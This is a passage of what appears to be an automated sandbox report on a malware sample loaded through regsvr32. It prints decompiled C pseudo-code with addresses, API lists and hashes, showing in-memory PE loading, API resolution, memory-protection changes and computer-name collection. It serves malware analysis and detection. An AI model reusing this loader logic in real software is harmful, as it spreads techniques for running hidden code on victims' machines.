                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ee8332359439ecd7df298dce70a3bb6acdc7ec0e9ad117d1426520cea129bf9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31315B71900129EFCF21DFA5C888D9BBB7AEFC97447104658F8169B250E331ED95CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 026D135A, Relevance: 3.1, APIs: 2, Instructions: 59stringthreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E026D135A() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x26d4150;
				if( *0x26d412c > 5) {
					_t16 = _t15 + 0x26d50f9;
				} else {
					_t16 = _t15 + 0x26d50b1;
				}
				E026D1FE7(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E026D1414( &_v32,  &_v16,  *0x26d414c ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x26d4138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E026D102F(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x26d4138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E026D200D(_t44, _t32 + 4);
						}
					}
					_t25 = E026D1E11(_v28); // executed
				}
				ExitThread(_t25);
			}















                                                                                                                                                                                                                                    0x026d1360
                                                                                                                                                                                                                                    0x026d1371
                                                                                                                                                                                                                                    0x026d137b
                                                                                                                                                                                                                                    0x026d1373
                                                                                                                                                                                                                                    0x026d1373
                                                                                                                                                                                                                                    0x026d1373
                                                                                                                                                                                                                                    0x026d1382
                                                                                                                                                                                                                                    0x026d138b
                                                                                                                                                                                                                                    0x026d1390
                                                                                                                                                                                                                                    0x026d13ae
                                                                                                                                                                                                                                    0x026d1405
                                                                                                                                                                                                                                    0x026d13b0
                                                                                                                                                                                                                                    0x026d13b6
                                                                                                                                                                                                                                    0x026d13bc
                                                                                                                                                                                                                                    0x026d13ca
                                                                                                                                                                                                                                    0x026d13ce
                                                                                                                                                                                                                                    0x026d13d5
                                                                                                                                                                                                                                    0x026d13d7
                                                                                                                                                                                                                                    0x026d13e3
                                                                                                                                                                                                                                    0x026d13e5
                                                                                                                                                                                                                                    0x026d13f4
                                                                                                                                                                                                                                    0x026d13e7
                                                                                                                                                                                                                                    0x026d13ed
                                                                                                                                                                                                                                    0x026d13ed
                                                                                                                                                                                                                                    0x026d13e5
                                                                                                                                                                                                                                    0x026d13fc
                                                                                                                                                                                                                                    0x026d13fc
                                                                                                                                                                                                                                    0x026d1407

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExitThreadlstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2636182767-0
                                                                                                                                                                                                                                    • Opcode ID: e806d10e5c99e1d57a01a36d772ed49a835e88ff7236d7478c73215048721251
                                                                                                                                                                                                                                    • Instruction ID: 6a2f4e0bdfc932881abacdc86267053da73c3a3c00b8fb69ab55b716feb3cb6f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e806d10e5c99e1d57a01a36d772ed49a835e88ff7236d7478c73215048721251
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4311BE71D0824D9FDB20DBA4C848EAB77E8AB0A300F4208AAB159E7250EB70E5948B51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E54BC, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E023E54BC(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E023E2049(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E023E9039(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                                                                                                                                                                                                    0x023e54c1
                                                                                                                                                                                                                                    0x023e54cc
                                                                                                                                                                                                                                    0x023e54ce
                                                                                                                                                                                                                                    0x023e54d4
                                                                                                                                                                                                                                    0x023e54d6
                                                                                                                                                                                                                                    0x023e54db
                                                                                                                                                                                                                                    0x023e54e4
                                                                                                                                                                                                                                    0x023e54e8
                                                                                                                                                                                                                                    0x023e54f1
                                                                                                                                                                                                                                    0x023e54f5
                                                                                                                                                                                                                                    0x023e5504
                                                                                                                                                                                                                                    0x023e54f7
                                                                                                                                                                                                                                    0x023e54f8
                                                                                                                                                                                                                                    0x023e54fd
                                                                                                                                                                                                                                    0x023e54fd
                                                                                                                                                                                                                                    0x023e54f5
                                                                                                                                                                                                                                    0x023e54e8
                                                                                                                                                                                                                                    0x023e550d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000003,00000000,023EA306,76D7F710,00000000,?,?,023EA306), ref: 023E54D4
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000003,00000000,023EA306,023EA307,?,?,023EA306), ref: 023E54F1
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ComputerHeapName$AllocateFree
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 187446995-0
                                                                                                                                                                                                                                    • Opcode ID: dd44a1eea04b9b8455c6eb74122d944c39bed0af7af1a060a933a1cae6e4fb40
                                                                                                                                                                                                                                    • Instruction ID: 8f4a4c0a4a13b8285fca877dec8d2ec8016bcd4891f159c501ae996db8277bf3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd44a1eea04b9b8455c6eb74122d944c39bed0af7af1a060a933a1cae6e4fb40
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EDF05467600129FBEF21D69A9C00FAF77AEDBC5654F510065E906D71C0EAB0DE098770
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E8055, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x23ed23c) == 0) {
						E023E970F();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x23ed23c) == 1) {
						_t10 = E023E6A56(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                                                                                                                                                                                                    0x023e805c
                                                                                                                                                                                                                                    0x023e805d
                                                                                                                                                                                                                                    0x023e8060
                                                                                                                                                                                                                                    0x023e8092
                                                                                                                                                                                                                                    0x023e8094
                                                                                                                                                                                                                                    0x023e8094
                                                                                                                                                                                                                                    0x023e8062
                                                                                                                                                                                                                                    0x023e8063
                                                                                                                                                                                                                                    0x023e8078
                                                                                                                                                                                                                                    0x023e807f
                                                                                                                                                                                                                                    0x023e8081
                                                                                                                                                                                                                                    0x023e8081
                                                                                                                                                                                                                                    0x023e807f
                                                                                                                                                                                                                                    0x023e8063
                                                                                                                                                                                                                                    0x023e809c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(023ED23C), ref: 023E806A
                                                                                                                                                                                                                                      • Part of subcall function 023E6A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,023E807D,?), ref: 023E6A69
                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(023ED23C), ref: 023E808A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3834848776-0
                                                                                                                                                                                                                                    • Opcode ID: 4f52faae9b4aa65394f224cee79c559da784bf033f6074d50f9f7cf4a8e7cc75
                                                                                                                                                                                                                                    • Instruction ID: 141a823f2fb99b590081d5473c437d5d5b43fb01602cfe62d9db0e64c1dfc6dc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f52faae9b4aa65394f224cee79c559da784bf033f6074d50f9f7cf4a8e7cc75
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CAE026B4E50232B39E306BB48804B5EA719AF84B80F018E20F687C41F0C710CC9ECAD1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E9318, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                                                                                    			E023E9318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x23ed27c; // 0x28da5a8
				_t4 = _t15 + 0x23ee39c; // 0x4cc8944
				_t20 = _t4;
				_t6 = _t15 + 0x23ee124; // 0x650047
				_t17 = E023E9152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E023E9FC9(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                                                                                                                                                                                                    0x023e9322
                                                                                                                                                                                                                                    0x023e9324
                                                                                                                                                                                                                                    0x023e932b
                                                                                                                                                                                                                                    0x023e932c
                                                                                                                                                                                                                                    0x023e932d
                                                                                                                                                                                                                                    0x023e932e
                                                                                                                                                                                                                                    0x023e9334
                                                                                                                                                                                                                                    0x023e9339
                                                                                                                                                                                                                                    0x023e9339
                                                                                                                                                                                                                                    0x023e9343
                                                                                                                                                                                                                                    0x023e9355
                                                                                                                                                                                                                                    0x023e935c
                                                                                                                                                                                                                                    0x023e938b
                                                                                                                                                                                                                                    0x023e935e
                                                                                                                                                                                                                                    0x023e9363
                                                                                                                                                                                                                                    0x023e9388
                                                                                                                                                                                                                                    0x023e9365
                                                                                                                                                                                                                                    0x023e9368
                                                                                                                                                                                                                                    0x023e936f
                                                                                                                                                                                                                                    0x023e937a
                                                                                                                                                                                                                                    0x023e9371
                                                                                                                                                                                                                                    0x023e9374
                                                                                                                                                                                                                                    0x023e9374
                                                                                                                                                                                                                                    0x023e937e
                                                                                                                                                                                                                                    0x023e937e
                                                                                                                                                                                                                                    0x023e9363
                                                                                                                                                                                                                                    0x023e9392

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E9152: SysFreeString.OLEAUT32(?), ref: 023E9231
                                                                                                                                                                                                                                      • Part of subcall function 023E9FC9: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,023E7946,004F0053,00000000,?), ref: 023E9FD2
                                                                                                                                                                                                                                      • Part of subcall function 023E9FC9: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,023E7946,004F0053,00000000,?), ref: 023E9FFC
                                                                                                                                                                                                                                      • Part of subcall function 023E9FC9: memset.NTDLL ref: 023EA010
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 023E937E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 397948122-0
                                                                                                                                                                                                                                    • Opcode ID: fa1d33aa9715b4522e632afaefa1d16057566079296ce3ddd57aa72bae0c3045
                                                                                                                                                                                                                                    • Instruction ID: 7b10dde529fb8a660570d2fd7d6f91b7a0ee291f2392f01263e8fa1fa1791e39
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa1d33aa9715b4522e632afaefa1d16057566079296ce3ddd57aa72bae0c3045
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1019E32500229BFCF209FA8CC04AEEBBB9EB48710F014865E912E71E0D370D959CB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 026D1FE7, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E026D1FE7(void* __eax, intOrPtr _a4) {

				 *0x26d4148 =  *0x26d4148 & 0x00000000;
				_push(0);
				_push(0x26d4144);
				_push(1);
				_push(_a4);
				 *0x26d4140 = 0xc; // executed
				L026D1BD6(); // executed
				return __eax;
			}



                                                                                                                                                                                                                                    0x026d1fe7
                                                                                                                                                                                                                                    0x026d1fee
                                                                                                                                                                                                                                    0x026d1ff0
                                                                                                                                                                                                                                    0x026d1ff5
                                                                                                                                                                                                                                    0x026d1ff7
                                                                                                                                                                                                                                    0x026d1ffb
                                                                                                                                                                                                                                    0x026d2005
                                                                                                                                                                                                                                    0x026d200a

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(026D1387,00000001,026D4144,00000000), ref: 026D2005
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3907675253-0
                                                                                                                                                                                                                                    • Opcode ID: 0af3f420d919bb9f090c1db091ebb44b4576691c6e10c3ad0566c21fe8448ffa
                                                                                                                                                                                                                                    • Instruction ID: 68e3302f64651f0577019575355b5eb630399dc8356ffc70b2086dea224a03ba
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0af3f420d919bb9f090c1db091ebb44b4576691c6e10c3ad0566c21fe8448ffa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EC04CB4D81309ABF7209B01DC45F297652776874DF105908F149761C08BF514A48919
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E2049, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E2049(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x23ed238, 0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                    0x023e2055
                                                                                                                                                                                                                                    0x023e205b

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                    • Opcode ID: 17d1d3afc806088ef16c4ea1d575780ea14f18ff22206dd57b30038742b2bcd4
                                                                                                                                                                                                                                    • Instruction ID: d6a83bda2f530f2250dd22b6bef867b19ef738f4638711b9bb7b91bfb0444853
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17d1d3afc806088ef16c4ea1d575780ea14f18ff22206dd57b30038742b2bcd4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AB012B6C80200EBCE218B40DD04F0DBB29AB54700F004D11F2044C0F0C3319878EB05
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 026D1E11, Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                    			E026D1E11(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x26d414c;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x26d414c - 0x63698bc4 &  !( *0x26d414c - 0x63698bc4);
				_t18 = E026D1A0F( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x26d414c - 0x63698bc4 &  !( *0x26d414c - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x26d414c - 0x63698bc4 &  !( *0x26d414c - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E026D125B(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t29 = E026D1745(_t40, _t44);
						if(_t29 == 0) {
							_t26 = E026D1179(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E026D1DFC(_t42);
					L8:
					return _t29;
				}
			}













                                                                                                                                                                                                                                    0x026d1e19
                                                                                                                                                                                                                                    0x026d1e1b
                                                                                                                                                                                                                                    0x026d1e37
                                                                                                                                                                                                                                    0x026d1e48
                                                                                                                                                                                                                                    0x026d1e4f
                                                                                                                                                                                                                                    0x026d1ead
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d1e51
                                                                                                                                                                                                                                    0x026d1e51
                                                                                                                                                                                                                                    0x026d1e5b
                                                                                                                                                                                                                                    0x026d1e5f
                                                                                                                                                                                                                                    0x026d1e64
                                                                                                                                                                                                                                    0x026d1e6c
                                                                                                                                                                                                                                    0x026d1e70
                                                                                                                                                                                                                                    0x026d1e75
                                                                                                                                                                                                                                    0x026d1e7a
                                                                                                                                                                                                                                    0x026d1e7e
                                                                                                                                                                                                                                    0x026d1e83
                                                                                                                                                                                                                                    0x026d1e84
                                                                                                                                                                                                                                    0x026d1e88
                                                                                                                                                                                                                                    0x026d1e8d
                                                                                                                                                                                                                                    0x026d1e95
                                                                                                                                                                                                                                    0x026d1e95
                                                                                                                                                                                                                                    0x026d1e8d
                                                                                                                                                                                                                                    0x026d1e7e
                                                                                                                                                                                                                                    0x026d1e70
                                                                                                                                                                                                                                    0x026d1e97
                                                                                                                                                                                                                                    0x026d1ea0
                                                                                                                                                                                                                                    0x026d1ea4
                                                                                                                                                                                                                                    0x026d1eae
                                                                                                                                                                                                                                    0x026d1eb4
                                                                                                                                                                                                                                    0x026d1eb4

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 026D1A0F: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,026D1E4D,?,?,?,?,?,00000002,?,026D1401), ref: 026D1A33
                                                                                                                                                                                                                                      • Part of subcall function 026D1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 026D1A55
                                                                                                                                                                                                                                      • Part of subcall function 026D1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 026D1A6B
                                                                                                                                                                                                                                      • Part of subcall function 026D1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 026D1A81
                                                                                                                                                                                                                                      • Part of subcall function 026D1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 026D1A97
                                                                                                                                                                                                                                      • Part of subcall function 026D1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 026D1AAD
                                                                                                                                                                                                                                      • Part of subcall function 026D125B: memcpy.NTDLL(?,?,?), ref: 026D1288
                                                                                                                                                                                                                                      • Part of subcall function 026D125B: memcpy.NTDLL(?,?,?), ref: 026D12BB
                                                                                                                                                                                                                                      • Part of subcall function 026D1745: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 026D177D
                                                                                                                                                                                                                                      • Part of subcall function 026D1179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 026D11B2
                                                                                                                                                                                                                                      • Part of subcall function 026D1179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 026D1227
                                                                                                                                                                                                                                      • Part of subcall function 026D1179: GetLastError.KERNEL32 ref: 026D122D
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,026D1401), ref: 026D1E8F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2673762927-0
                                                                                                                                                                                                                                    • Opcode ID: 1e0e7f40eb3b6c41a9d3a95be717bd9992f0b0a79e56f18d29dbf3a00e9859b9
                                                                                                                                                                                                                                    • Instruction ID: 6b9cebcb2dc87125c8f23bb3939e230fba9b1132e349114b75cb0f55c1d0c987
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e0e7f40eb3b6c41a9d3a95be717bd9992f0b0a79e56f18d29dbf3a00e9859b9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8112236E0071DABD7209BB5CC80EAF777DAF8A2147044499E909D7640E7F0ED058BE0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E21CD, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                                                    			E023E21CD(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x23ed330;
				E023E84D5();
				while(1) {
					_t8 = E023E12D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E023E809F(_t14);
					if(_t15 == 0) {
						HeapFree( *0x23ed238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E023E84D5();
					if(_t19 != 0) {
						_t22 =  *0x23ed338; // 0x4cc9b70
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                                                                                                                                                                                                                    0x023e21d5
                                                                                                                                                                                                                                    0x023e21d9
                                                                                                                                                                                                                                    0x023e21da
                                                                                                                                                                                                                                    0x023e21db
                                                                                                                                                                                                                                    0x023e21e0
                                                                                                                                                                                                                                    0x023e21e5
                                                                                                                                                                                                                                    0x023e21ec
                                                                                                                                                                                                                                    0x023e21f3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e21f5
